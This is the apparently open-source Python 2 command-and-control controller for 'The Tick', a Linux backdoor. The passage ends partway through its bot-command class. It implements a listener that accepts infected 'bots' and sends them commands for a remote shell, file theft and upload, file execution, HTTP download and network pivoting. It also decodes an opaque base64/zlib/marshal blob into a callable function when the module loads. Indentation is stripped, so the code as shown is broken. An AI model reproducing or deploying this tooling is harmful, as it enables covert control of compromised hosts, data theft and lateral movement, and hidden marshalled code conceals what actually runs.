#!/usr/bin/env python2
# -*- coding: utf8 -*-
"""
The Tick, a Linux embedded backdoor.
Released as open source by NCC Group Plc - http://www.nccgroup.com/
Developed by Mario Vilas, mario.vilas@nccgroup.com
http://www.github.com/nccgroup/thetick
See the LICENSE file for further details.
"""
##############################################################################
# Imports and other module initialization.
# This namespace is pretty cluttered so make sure
# "from tick import *" doesn't make too much of a mess.
__all__ = ["Listener", "Console", "BotError"]
# Standard imports...
import sys
import readline
import os
import os.path
# More standard imports...
from socket import *
from struct import *
from cmd import Cmd
from shlex import split
from threading import Thread, RLock
from traceback import print_exc
from uuid import UUID
from collections import OrderedDict
from argparse import ArgumentParser
from time import sleep
from functools import wraps
from multiprocessing import Process
from subprocess import check_output
# This is our first dependency and we check it now so
# we know if we can use colors to show errors later.
try:
from colorama import *
# Disable colors if requested.
#
# Note that we have do do this here rather than
# when parsing the command line arguments, since
# several error conditions would happen before that.
# or even withing argparse itself.
#
# Unfortunately this also disables all the other nifty
# console tricks we can do with ANSI escapes too. :(
if "--no-color" in sys.argv:
ANSI_ENABLED = False
init(wrap = True, strip = True)
else:
ANSI_ENABLED = True
init()
except ImportError:
print "Missing dependency: colorama"
print " pip install colorama"
exit(1)
# Adds support for colors to argparse. Very important, yes!
try:
from argparse_color_formatter import ColorHelpFormatter
except ImportError:
print "Missing dependency: " + Style.BRIGHT + Fore.RED + "argparse_color_formatter" + Style.RESET_ALL
print Style.BRIGHT + Fore.BLUE + " pip install argparse-color-formatter" + Style.RESET_ALL
exit(1)
# ASCII art tables. Of course we need this, why do you ask?
try:
from texttable import Texttable
except ImportError:
print "Missing dependency: "+ Style.BRIGHT + Fore.RED + "texttable" + Style.RESET_ALL
print Style.BRIGHT + Fore.BLUE + " pip install texttable" + Style.RESET_ALL
exit(1)
# Yeah it's not pythonic to use asserts like that,
# but an old dog don't learn new tricks, y'know.
# And also, to be fair, CPython's idea of "optimization"
# breaks too many things anyway, so let's prevent that too.
try:
assert False
print "Running with assertions disabled is a " + Style.BRIGHT + Fore.RED + "TERRIBLE IDEA" + Style.RESET_ALL,
if ANSI_ENABLED:
print " \xf0\x9f\x98\xa0" # angry face emoji
else:
print
print "Please don't do that ever again..."
exit(1)
except AssertionError:
pass
##############################################################################
# Some good old blobs. Nothing says "trust this code and run it" like blobs.
# Boring banner :(
BORING_BANNER = """
ICAbWzMybRtbMW3ilZTilabilZcbWzIybeKUrCDilKzilIzilIDilJAgIBtbMW3ilZTilabilZcb
WzIybeKUrOKUjOKUgOKUkOKUrOKUjOKUgBtbMG0KICAbWzMybRtbMW0g4pWRIBtbMjJt4pSc4pSA
4pSk4pSc4pSkICAgG1sxbSDilZEgG1syMm3ilILilIIgIOKUnOKUtOKUkBtbMG0KICAbWzMybRtb
MW0g4pWpIBtbMjJt4pS0IOKUtOKUlOKUgOKUmCAgG1sxbSDilakgG1syMm3ilLTilJTilIDilJji
lLQg4pS0G1swbQo=
""".decode("base64")
# Fun banner :)
FUN_BANNER = """
ChtbMzFtG1sxbeKWhOKWhOKWhOKWiOKWiOKWiOKWiOKWiBtbMjJt4paTIBtbMW3ilojilogbWzIy
beKWkSAbWzFt4paI4paIG1syMm0g4paTG1sxbeKWiOKWiOKWiOKWiOKWiCAgICDiloTiloTiloTi
lojilojilojilojilogbWzIybeKWkyAbWzFt4paI4paIG1syMm3ilpMgG1sxbeKWhOKWiOKWiOKW
iOKWiOKWhCAgIOKWiOKWiCDiloTilojiloAbWzIybQobWzIybeKWkyAgG1sxbeKWiOKWiBtbMjJt
4paSIOKWk+KWkuKWkxtbMW3ilojilogbWzIybeKWkSAbWzFt4paI4paIG1syMm3ilpLilpMbWzFt
4paIG1syMm0gICAbWzFt4paAG1syMm0gICAg4paTICAbWzFt4paI4paIG1syMm3ilpIg4paT4paS
4paTG1sxbeKWiOKWiBtbMjJt4paS4paSG1sxbeKWiOKWiOKWgCDiloDiloggICDilojilojiloTi
logbWzIybeKWkiAbWzIybQobWzIybeKWkiDilpMbWzFt4paI4paIG1syMm3ilpEg4paS4paR4paS
G1sxbeKWiOKWiOKWgOKWgOKWiOKWiBtbMjJt4paR4paSG1sxbeKWiOKWiOKWiBtbMjJtICAgICAg
4paSIOKWkxtbMW3ilojilogbWzIybeKWkSDilpLilpHilpIbWzFt4paI4paIG1syMm3ilpLilpIb
WzFt4paT4paIICAgIOKWhCDilpPilojilojilojiloQbWzIybeKWkSAbWzIybQobWzIybeKWkSDi
lpMbWzFt4paI4paIG1syMm3ilpMg4paRIOKWkRtbMW3ilpPilogbWzIybSDilpEbWzFt4paI4paI
G1syMm0g4paS4paTG1sxbeKWiCAg4paEG1syMm0gICAg4paRIOKWkxtbMW3ilojilogbWzIybeKW
kyDilpEg4paRG1sxbeKWiOKWiBtbMjJt4paR4paSG1sxbeKWk+KWk+KWhCDiloTilojilojilpLi
lpMbWzFt4paI4paIIOKWiOKWhCAbWzIybQobWzIybSAg4paS4paIG1sxbeKWiBtbMjJt4paSIOKW
kSDilpEbWzFt4paT4paI4paSG1syMm3ilpHilogbWzFt4paIG1syMm3ilpPilpHilpIbWzFt4paI
4paI4paI4paIG1syMm3ilpIgICAgIOKWkuKWiBtbMW3ilogbWzIybeKWkiDilpEg4paRG1sxbeKW
iOKWiBtbMjJt4paR4paSIBtbMW3ilpPilojilojilojiloAbWzIybSDilpHilpLilogbWzFt4paI
G1syMm3ilpIgG1sxbeKWiOKWhBtbMjJtChtbMjJtICDilpIg4paR4paRICAgIBtbMW3ilpIbWzIy
bSDilpHilpEbWzFt4paS4paR4paSG1syMm3ilpHilpEg4paS4paRIOKWkSAgICAg4paSIOKWkeKW
kSAgIOKWkRtbMW3ilpMbWzIybSAg4paRIOKWkeKWkiDilpIgIOKWkeKWkiDilpLilpIgG1sxbeKW
kxtbMjJt4paSG1syMm0KG1syMm0gICAg4paRICAgICDilpIg4paR4paS4paRIOKWkSDilpEg4paR
ICDilpEgICAgICAg4paRICAgICDilpIg4paRICDilpEgIOKWkiAgIOKWkSDilpHilpIg4paS4paR
G1syMm0KG1syMm0gIOKWkSAgICAgICAbWzJt4paRG1syMm0gIOKWkeKWkSDilpEgICAbWzJt4paR
G1syMm0gICAgICAgIOKWkSAgICAgICDilpIg4paR4paRICAgICAgICAbWzJt4paRG1syMm0g4paR
4paRIBtbMm3ilpEbWzIybSAbWzIybQobWzJtICAgICAgICAgIOKWkSAg4paRICDilpEgICDilpEg
IOKWkSAgICAgICAgICAgICDilpEgIBtbMjJt4paRG1sybSDilpEgICAgICDilpEgIOKWkSAgIBtb
MjJtChtbMm0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg4paRICAgICAg
ICAgICAgICAgG1syMm0KG1swbQ==
""".decode("base64")
# This is a cute Easter Egg for those of you who read the source code. ;)
# For the extra paranoid out there: you can just remove this blob, nothing
# will break. Make sure to wear your favorite tinfoil hat when you do it!
play = """
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
"""
try:
import marshal, types, zlib
play = play.decode("base64")
play = zlib.decompress(play)
play = marshal.loads(play) # I know many of you will
play = types.FunctionType(play, globals(), "play") # go "yikes" now xD
except Exception:
del play # no easter egg for you, sorry :(
print_exc()
#del play # uncomment to disable
##############################################################################
# Custom TCP protocol definitions and helper functions.
# Base command IDs per category.
BASE_CMD_SYSTEM = 0x0000
BASE_CMD_FILE = 0x0100
BASE_CMD_NET = 0x0200
# No operation command.
CMD_NOP = 0xFFFF
# System commands.
CMD_SYSTEM_EXIT = BASE_CMD_SYSTEM + 0
CMD_SYSTEM_FORK = BASE_CMD_SYSTEM + 1
CMD_SYSTEM_SHELL = BASE_CMD_SYSTEM + 2
# File I/O commands.
CMD_FILE_READ = BASE_CMD_FILE + 0
CMD_FILE_WRITE = BASE_CMD_FILE + 1
CMD_FILE_DELETE = BASE_CMD_FILE + 2
CMD_FILE_EXEC = BASE_CMD_FILE + 3
CMD_FILE_CHMOD = BASE_CMD_FILE + 4
# Network commands.
CMD_HTTP_DOWNLOAD = BASE_CMD_NET + 0
CMD_DNS_RESOLVE = BASE_CMD_NET + 1
CMD_TCP_PIVOT = BASE_CMD_NET + 2
# Response codes.
CMD_STATUS_OK = 0x00
CMD_STATUS_ERROR = 0xFF
# TCP pivot structure for IPv4.
# typedef struct // (all values below in network byte order)
# {
# uint32_t ip; // IP address to connect to
# uint16_t port; // TCP port to connect to
# uint16_t from_port; // Optional TCP port to connect from
# } CMD_TCP_PIVOT_ARGS;
def build_pivot_struct(ip, port, from_port = 0):
return inet_aton(ip) + pack("!HH", port, from_port)
# Command header.
# typedef struct
# {
# uint16_t cmd_id; // Command ID, one of the CMD_* constants
# uint16_t cmd_len; // Small data size, to be read in memory while parsing
# uint32_t data_len; // Big data size, to be read by command implementations
# } CMD_HEADER;
# Build the command header structure.
def build_command(cmd_id, cmd = "", data = ""):
cmd_len = len(cmd)
try:
data_len = len(data)
except TypeError:
data_len = data
data = ""
return pack("!HHL", cmd_id, cmd_len, data_len) + cmd + data
# Response header.
# typedef struct
# {
# uint8_t status; // Status code (OK or error)
# uint32_t data_len; // Big data size
# } RESP_HEADER;
# Get only the response header from the socket.
# Data following the header must be read separately.
def get_resp_header(sock):
status = sock.recv(1)
data_len = sock.recv(4)
if status == "" or data_len == "":
raise BotError("disconnected")
status, data_len = unpack("!BL", status + data_len)
if status == CMD_STATUS_ERROR:
if data_len > 0:
msg = recvall(sock, data_len)
if len(msg) != data_len:
raise BotError("disconnected")
raise BotError(msg)
return data_len
# Skip bytes coming from the bot we don't actually need to read.
def skip_bytes(sock, count):
while count > 0:
bytes = len(sock.recv(count))
if bytes == 0:
raise BotError("disconnected")
count = count - bytes
# Get the response header and ignore the response data.
# We'll use this for commands that don't require a response;
# that way even if the bot sends data we don't expect, the
# protocol won't break. Future compatibility FTW :)
def get_resp_no_data(sock):
data_len = get_resp_header(sock)
skip_bytes(sock, data_len)
# Read a fixed size block of data from a socket.
# Caller must ensure to check for errors.
def recvall(sock, count):
buffer = ""
while len(buffer) < count:
tmp = sock.recv(min(65536, count - len(buffer)))
if not tmp:
break
buffer = buffer + tmp
return buffer
# Get the response header and the data, all together.
# We'll use this only for responses we assume have a reasonable
# amount of response data. TODO: perhaps make sure this is
# the case somehow - not too worried about this anyway.
def get_resp_with_data(sock):
data_len = get_resp_header(sock)
data = recvall(sock, data_len)
if len(data) != data_len:
raise BotError("disconnected")
return data
# Copy a fixed amount of bytes from one file descriptor to another.
# If the data runs out before the operation is over, we fail silently.
# TODO: it'd be best to handle this error case too, but we must review
# how to do it specifically for each case.
def copy_stream(src, dst, count):
while count > 0:
buffer = src.read(min(65536, count))
if not buffer:
break
count = count - len(buffer)
dst.write(buffer)
##############################################################################
# C&C server over a custom TCP protocol.
# This class is exported by the module so we can
# have C&C servers decoupled from the console UI.
# Well, in theory. One day. We'll see.
class Listener(Thread):
"Listener C&C for The Tick bots."
def __init__(self, callback, bind_addr = "0.0.0.0", port = 5555):
# True when running, False when shutting down.
self.alive = False
# Callback to be invoked every time a new bot connects.
# The callback will receive two arguments, the listener
# itself and the bot that just connected.
self.callback = callback
# Bind address and port.
self.bind_addr = bind_addr
self.port = port
# Listening socket.
self.listen_sock = None
# Ordered dictionary with the bots that connected.
# It will become apparent why we're using an ordered dict
# instead of a regular dict once you read the source code
# to the Console class.
self.bots = OrderedDict()
# Call the parent class constructor.
super(Listener, self).__init__()
# Set the thread as a daemon so way when the
# main thread dies, this thread will die too.
self.daemon = True
# Context manager to ensure all the sockets are closed on exit.
# The bind and listen code is here to make sure its use is mandatory.
def __enter__(self):
self.listen_sock = socket()
self.listen_sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.listen_sock.bind((self.bind_addr, self.port))
self.listen_sock.listen(5)
return self
# Context manager to ensure all the sockets are closed on exit,
# the "running" flag is set to False, and the "bots" dictionary
# is cleared.
def __exit__(self, *args):
self.alive = False
try:
self.listen_sock.shutdown(2)
except Exception:
pass
try:
self.listen_sock.close()
except Exception:
pass
self.listen_sock = None
for bot in self.bots.values():
try:
bot.sock.shutdown(2)
except Exception:
pass
try:
bot.sock.close()
except Exception:
pass
self.bots.clear()
# This method is invoked in a background thread.
# It receives incoming bot connetions and invokes the callback.
def run(self):
# Sanity check.
assert not self.alive
# We are running now! Yay! \o/
self.alive = True
# Use the context manager to ensure all resources are freed.
with self:
# Loop until we are signaled to stop.
while self.alive:
try:
# Accept an incoming bot connection.
# This is a blocking call and the background
# thread will spend most of the time stuck here.
sock, from_addr = self.listen_sock.accept()
try:
# Uh-oh, someone asked us to stop, so quit now.
if not self.alive:
try:
sock.shutdown(2)
except Exception:
pass
try:
sock.close()
except Exception:
pass
break
# The first 16 bytes that come from the socket
# must be the bot UUID value. This value is
# generated randomly by the bot when starting up.
# It DOES NOT identify the target machine, but
# rather the bot instance, so multiple instances
# on the same machine will have different UUIDs.
uuid = recvall(sock, 16)
if len(uuid) != 16:
continue
uuid = str(UUID(bytes = uuid))
# Instance a Bot object for this new connection.
bot = Bot(sock, uuid, from_addr)
# Keep it in the ordered dictionary. This means
# the dictionary will remember the order in which
# the bots connected. This is useful for the Console
# class later on.
self.bots[uuid] = bot
# On error make sure to destroy the accepted socket.
except:
try:
sock.shutdown(2)
except Exception:
pass
try:
sock.close()
except Exception:
pass
raise
# Invoke the callback function to notify
# a new bot has connected to the C&C.
try:
self.callback(self, bot)
except Exception:
print_exc()
# Print exceptions and continue running.
# TODO maybe use the console notifications for this?
except Exception:
print_exc()
# The accept() call is a bit particular in Python,
# we can't just close the socket and call it a day.
# This resulted in stubborn listener threads who simply
# refused to die... extreme measures had to be taken. ;)
def kill(self):
"Forcefully kill the background thread."
# Trivial case.
if not self.alive:
return
# Set the flag to false so the thread
# knows we are asking it to quit.
self.alive = False
# Connect briefly to the listnening port.
# This will "wake up" the thread stuck
# in the blocking socket accept() call.
s = socket()
try:
s.connect(("127.0.0.1", self.port))
finally:
s.close()
##############################################################################
# How to talk to connected bots.
# Class for all bot related exceptions.
class BotError(RuntimeError):
"The Tick bot error message."
# This decorator will do some basic checks on bot actions.
# It also catches some error conditions such as the bot being disconnected
# or the user canceling the operation with Control+C.
def bot_action(method):
@wraps(method)
def wrapper(self, *args, **kwds):
assert self.alive
try:
return method(self, *args, **kwds)
except KeyboardInterrupt:
self.alive = False
try:
self.sock.shutdown(2)
except:
pass
try:
self.sock.close()
except:
pass
raise BotError("disconnected")
except BotError, e:
if str(e) == "disconnected":
self.alive = False
raise
return wrapper
# This class is not exported because I don't see a real reason
# for a user of this module to manually instance Bot objects.
class Bot(object):
"The Tick bot instance."
def __init__(self, sock, uuid, from_addr):
# True if we can send commands to this instance, False otherwise.
# False could either mean the bot is dead or the socket is being
# used for something else, since some commands reuse the C&C socket.
self.alive = True
# The C&C socket to talk to this bot.
self.sock = sock
# The UUID for this bot instance.
# See Listener.run() for more details.
self.uuid = uuid
# IP address and remote port where the connection came from.
#
# The IP address may not be correct if the bot is behind a NAT.
# You can run the file_exec command to figure out the real IP.
# Use your imagination. ;)
#
# The port is not terribly useful right now, but when we add
# support for having the bot listen on a port rather than
# connect to us, this may come in handy.
self.from_addr = from_addr
# Useful for debugging.
def __repr__(self):
return "<Bot uuid=%s ip=%s port=%d connected=%s>" % (
self.uuid, self.from_addr[0], self.from_addr[1],
"yes" if self.alive else "no"
)
#
# The remainder of this class are the supported commands.
# The code is pretty straightforward so I did not comment it.
#
@bot_action
def system_exit(self):
self.sock.sendall( build_command(CMD_SYSTEM_EXIT) )
get_resp_no_data(self.sock)
self.alive = False
@bot_action
def system_fork(self):
self.sock.sendall( build_command(CMD_SYSTEM_FORK) )
return str( UUID( bytes = get_resp_with_data(self.sock) ) )
@bot_action
def system_shell(self):
self.sock.sendall( build_command(CMD_SYSTEM_SHELL) )
get_resp_no_data(self.sock)
self.alive = False
return self.sock
@bot_action
def file_read(self, remote_file, local_file):
self.sock.sendall( build_command(CMD_FILE_READ, remote_file) )
data_len = get_resp_header(self.sock)
with open(local_file, "wb") as fd:
copy_stream(self.sock.makefile(), fd, data_len)
@bot_action
def file_write(self, local_file, remote_file):
with open(local_file, "rb") as fd:
fd.seek(0, 2)
file_size = fd.tell()
fd.seek(0, 0)
self.sock.sendall( build_command(CMD_FILE_WRITE, remote_file, file_size) )
copy_stream(fd, self.sock.makefile(), file_size)
get_resp_no_data(self.sock)
@bot_action
def file_delete(self, remote_file):
self.sock.sendall( build_command(CMD_FILE_DELETE, remote_file) )
